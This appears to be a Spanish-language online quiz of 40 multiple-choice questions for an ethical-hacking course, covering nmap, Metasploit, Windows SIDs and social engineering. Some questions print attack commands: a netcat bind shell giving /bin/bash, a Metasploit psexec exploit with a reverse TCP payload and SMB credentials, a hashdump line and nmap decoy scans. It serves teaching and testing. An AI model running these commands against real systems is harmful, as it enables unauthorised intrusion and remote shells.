option
Cuestiones
ayuda
daypo
buscar.php

pratica

COMENTARIOS ESTADÍSTICAS RÉCORDS
REALIZAR TEST
Título del Test:
pratica

Descripción:
pratica

Fecha de Creación: 2022/12/26

Categoría: Otros

Número Preguntas: 40

Valoración:(4)
COMPARTE EL TEST
Nuevo ComentarioNuevo Comentario
Comentarios
NO HAY REGISTROS
Temario:

Alicia usa el siguiente comando para escanear su objetivo: nmap -sS -O -D192.188.59.1,200.20.2.2,157.4.5.32,me -oX host.xml 172.16.5.15 (Escoja todas las sentencias verdaderas respecto a este comando). Se efectúa detección de sistema operativo. Alicia está haciendo uso de señuelos. El tipo de escaneo es connect. Se escanean 4 objetivos.

Un cracker logra ingresar a un equipo Windows Server en español y extrae la SAM. Para su sorpresa el usuario de nombre Administrador tiene RID 1000. El cracker está sorprendido muy probablemente porque: El usuario Administrador no es en realidad el administrador built-in. El usuario Administrador tiene el doble de privilegios. El usuario de nombre Administrador debe tener RID 500 siempre. El usuario Administrador tiene un RID incorrecto.

Para abrir la consola de Metasploit el comando es: msfconsole. msfcli. Armitage. metasploit-console.

Pepito clona con SET un sitio web de un banco y codifica un payload malicioso en la página principal. Luego crea un correo falso de parte del banco y se lo envía a sus posibles víctimas. En el correo se incluye un enlace hacia el sitio falso de Pepito haciéndole creer al cliente que es el sitio del banco. Este tipo de ataque se denomina _________. (Complete con la palabra correcta). Tailgating. Vishing. Phishing. Malware.

Escoja todas las sentencias correctas respecto a analizadores de vulnerabilidades: Acunetix es un analizador web open-source. Burp-Suite es un analizador web que tiene una versión comercial y también community. ZAP es un analizador web y proxy desarrollado por OWASP. Nessus es un analizador comercial desarrollado por Tenable.

Vania desea ejecutar un módulo auxiliar en el msfconsole, así que escribe: msf > use auxiliary/scanner/ftp/anonymous msf auxiliary(anonymous) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS mozilla@example.com no The password for the specified username FTPUSER anonymous no The username to authenticate as RHOSTS yes The target address range or CIDR identifier RPORT 21 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(anonymous) > set RHOSTS 192.168.1.200-254 msf auxiliary(anonymous) > set THREADS 55 ¿Qué comando debe usar Vania para ejecutar el módulo?. exploit run. exec. run. exploit.

La empresa INSEGURA S.A. decide contratarlo para efectuar un hacking ético. Luego de firmar el contrato, le dan a usted un listado de 20 direcciones IP a auditar. Este es un clásico ejemplo de black-box hacking. Seleccione una: Verdadero. Falso.

¿Cuáles de los siguientes son métodos de escaneo conocidos que pueden efectuarse con NMAP? (Escoja todos los que apliquen). Hiper Scan. FIN Scan. XMAS Scan. TCP Scan.

Un hacker desea detectar si hay un firewall de por medio entre él y un sistema Linux remoto. Para ello ejecuta el comando: nmap -sA -p80 172.17.234.28 Pero no obtiene ninguna respuesta de regreso. Esto implica que el puerto 80 está: No-Filtrado. Abierto. Filtrado. Cerrado.

En esta fase del círculo del hacking se profundiza en la búsqueda de información del objetivo como, por ejemplo: nombres de usuarios y grupos, carpetas compartidas, etc. El nombre de la fase es: Obtener acceso. Reconocimiento. Borrar huellas. Escaneo.

Liliana abre el msfconsole y escribe el comando workspace empresaX. A continuación, escribe el comando hosts pero no obtiene resultados. Liliana se sorprende porque tan solo anoche efectuó un scan desde el msfconsole con db_nmap. (Escoja la razón más probable de lo que le sucede a Liliana). Liliana usó el msfcli y no el msfconsole anoche. La tabla de hosts sólo se puede llenar en el workspace default. Probablemente Liliana efectuó el escaneo con db_nmap en otro workspace. Liliana obviamente está muy cansada y soñó que hizo un scan con db_nmap.

Cuando un cracker mira por sobre el hombro de la víctima con el ánimo de ver su clave se denomina a este ataque: Shoulder-surfing. Tailgating. Dumpster-diving. Suplantación.

Adriana, la administradora de sistemas Windows, recibe una llamada solicitando soporte de parte de Edmundo, su ex-novio y contador de la empresa ACME. Cuando ella acude a brindarle soporte, Edmundo le indica que tiene problemas para autenticarse en el dominio Windows y le pide a Adriana que pruebe con sus credenciales en su PC para verificar que el problema no es del servicio de autenticación sino del usuario de Edmundo. Adriana se rehúsa rotundamente a ingresar su usuario y clave en el PC de Edmundo. Ante esta actitud de Adriana resulta evidente que: Adriana odia a Edmundo por haber terminado con ella y quiere desquitarse negándole el soporte. Adriana considera inseguro realizar logon en un PC que no sea el suyo debido al almacenamiento en memoria de Windows. Adriana está segura de que Edmundo instaló un keylogger en el PC. El servicio de autenticación de Windows no tiene problemas y es seguro que Edmundo olvidó su clave.

La simulación de equipo robado es un servicio opcional que un cliente podría querer contratar como parte de un hacking ético. Seleccione una: Verdadero. Falso.

Edgar realiza un escaneo de tipo ACK con NMAP sobre el puerto de un objetivo y recibe como respuesta un RST. Esto implica que: El puerto no está filtrado. El puerto está filtrado. El puerto está abierto. El puerto está cerrado.

En el modo insane en NMAP el valor del temporizador T es: 5. 0. 1. 2.

Roberto ejecuta el comando nc -lvp 443 -e /bin/bash en su estación de trabajo con IP 172.17.82.14. Inmediatamente Alicia abre un prompt desde su PC con IP 172.17.82.57 y ejecuta el comando nc 172.17.82.14 443. Entonces lo que ocurre es que: Alicia obtiene un shell en el computador de Roberto. Roberto obtiene un shell en el computador de Alicia y la transmisión de comandos usa SSL. Alicia obtiene un shell en el computador de Roberto y la transmisión de comandos usa SSL. Roberto obtiene un shell en el computador de Alicia.

Cuando un intruso aprovecha el ingreso de personal autorizado a un área restringida para pasar junto con él se denomina a este ataque: Dumpster-diving. Shoulder-surfing. Tailgating. Suplantación.

La principal diferencia entre un módulo Auxiliar y un Exploit en Metasploit es que: Los módulos exploits se usan para elevar privilegios. Los módulos exploits no admiten payloads. Los módulos auxiliares no admiten payloads. Los módulos auxiliares se usan para efectuar ataques de claves.

¿Cuáles de los siguientes se consideran hacking frameworks? Escoja todos los que apliquen. Maltego. Core Impact. Immunity Canvas. Metasploit.

En un escaneo de tipo ACK el propósito que persigue el pentester es: Detectar si existe un IDS de por medio. Detectar equipos que puedan ser usados como zombies. Descubrir si existen puertos filtrados. Hacer uso de señuelos.

El escaneo Syn o half-scan se caracteriza porque se completa el three-way handshake TCP: Seleccione una: Verdadero. Falso.

Se desea efectuar detección de versión de las aplicaciones de un sistema remoto Linux con IP 192.168.10.50. La opción de Nmap para efectuar esto es: nmap -sS -s_ -T4 -oX out.xml 192.168.10.50 (Complete con la opción correcta). V. o. O. v.

Héctor trabaja como consultor de seguridad para la empresa Good Guys S.A. Durante los fines de semana a Héctor le gusta explotar servidores remotos de China y usarlos como paso intermedio para ingresar a portales 3X y descargar películas. Héctor es un: Hacker de sombrero blanco. Hacker de sombrero gris. Hacktivista. Hacker de sombrero negro.

Realizar wardriving e ingeniería social es un paso obligatorio de todo hacking ético externo. Verdadero. Falso.

Cuáles de las siguientes afirmaciones son correctas respecto a los SIDs de Windows? Escoja todas las que apliquen. El último valor de un SID se denomina RID. El administrador built-in tiene como RID el valor 500. El cuarto elemento en un SID es el indicador de subautoridad. El RID del usuario Guest es 512.

José Luis quiere detectar la versión del sistema operativo del servidor svr1.domainxyz.com usando nmap. Por ello deberá escribir: nmap -sT -__ svr1.domainxyz.com. (Complete con la opción correcta). V. O. v. o.

Andrés realiza un barrido de pings de la red 192.168.1.0/24, este es un ejemplo de: Reconocimiento activo. Enumeración. Reconocimiento pasivo. Hacking.

Elena busca en la sección de clasificados del periódico local por posibles anuncios de la empresa ABC S.A. y encuentra lo siguiente: "La empresa ABC S.A. requiere contratar experto en Java con conocimientos de Apache Server para trabajar como Webmaster. Interesados enviar hoja de vida a rrhh@abc.com". Este es un ejemplo de: Explotación. Escaneo. Reconocimiento activo. Reconocimiento pasivo.

Escoja entre los siguientes aquellos ataques que puedan clasificarse como de reconocimiento: Diana hace uso de ARP gratuito y cambia la tabla MAC de dos PCs. Julio usa fierce sobre el dominio objetivo. Lourdes consulta la base Who-Is. Rita captura paquetes con un sniffer en una red switcheada.

Juan Carlos desea ejecutar un half-scan sobre el objetivo con IP 192.168.100.201. Para ello deberá usar el siguiente comando: nmap -s__ 192.168.100.201. (Complete con la opción correcta). S. s. V. v.

La enumeración es una subfase de: Obtener acceso. Escaneo. Reconocimiento activo. Hacking o explotación.

Esta herramienta permite realizar escaneo de puertos, detección de sistemas operativos, detección de versiones de aplicaciones y ejecución de scripts personalizados para efectuar descubrimiento de redes, detectar vulnerabilidades, identificar backdoors, entre otras. Fue desarrollada por Fyodor. Nmap. Maltego. Sam Spade. Nessus.

En el modo paranoico en NMAP el valor del temporizador T es: 0. 5. 2. 1.

Cuál de las siguientes NO es una herramienta que puede efectuar análisis de vulnerabilidades?. Nslookup. Nessus. Nexpose. GVM.

Durante un XMAS Scan se prenden las banderas: (escoja todas las que apliquen). ACK. URG. PSH. FIN.

César ejecuta un exploit del protocolo SMB con Metasploit y obtiene un shell reverso de Meterpreter en un servidor Windows. A continuación, César interactúa con la sesión y ejecuta el comando hashdump. En una de las líneas recuperadas se muestra lo siguiente: victor:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: Esto implica con absoluta seguridad que: El usuario victor es el administrador built-in. La clave del usuario victor es menor a 14 caracteres. El usuario victor es en realidad el Invitado. La clave del usuario victor está basada en palabras del diccionario.

Buscar por información confidencial en la basura se denomina: Tailgating. Suplantación. Shoulder-surfing. Dumpster-diving.

Escoja entre las siguientes herramientas aquellas desde las cuales se pueden efectuar análisis de vulnerabilidades. (Escoja todas las que apliquen). Smart WhoIs. Nessus. Tcp-ping. GVM.

Xavier desea ejecutar un exploit, así que ingresa estos comandos en el msfconsole: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.1.100 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.5 msf exploit(psexec) > set LPORT 4444 msf exploit(psexec) > set SMBUSER victim msf exploit(psexec) > set SMBPASS s3cr3t Puesto que el exploit ya fue parametrizado, ¿qué comando debe usar Xavier para ejecutar el exploit?. exploit. run. run exploit. exec.

Denunciar Test